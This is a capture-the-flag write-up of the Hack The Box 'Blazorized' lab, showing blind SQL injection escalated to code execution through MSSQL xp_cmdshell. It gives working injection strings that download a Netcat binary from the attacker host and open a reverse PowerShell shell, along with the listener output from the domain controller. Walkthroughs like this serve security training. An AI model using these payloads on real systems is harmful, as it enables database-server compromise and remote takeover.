InfoSec LAB

Blazorized_Exploitation

Created: 2 min read

SQLi to RCE

SQL injection vulnerability has been confirmed to be present at the /check-duplicate-post-title endpoint of the admin panel.

Since it’s a blind SQLi, it would be rather tedious to enumerate the database. Provided it is connected to the admin panel, the MSSQL instance might be running with relatively high privileges, so I will attempt to get code execution directly, via xp_cmdshell

Initial Attempt (SMB)

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ simplesmb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0

Setting up a local SMB server

Sending the SQLi payload

It seems to have fetched the Netcat binary, but there is no execution Either the C:\ directory is not writable, or there is a limitation to SMB

Second Attempt (HTTP)

I will try again over HTTP to a different directory

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) exec master..xp_cmdshell 'powershell -ep bypass -c "curl http://10.10.14.110/nc64.exe -o %TEMP%\nc64.exe"' -- This method downloads the Netcat binary over HTTP to the %TEMP% directory

Fetched!

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) exec master..xp_cmdshell 'powershell -ep bypass -c "%TEMP%\nc64.exe 10.10.14.110 9999 -e powershell"' -- Now execution

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ nnc 9999                                                                    
listening on [any] 9999 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.22] 50690
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
blazorized\nu_1055
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.22
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Initial Foothold established to the target system as the nu_1055 account via the MSSQL’s xp_cmdshell

Interactive Graph View

Backlinks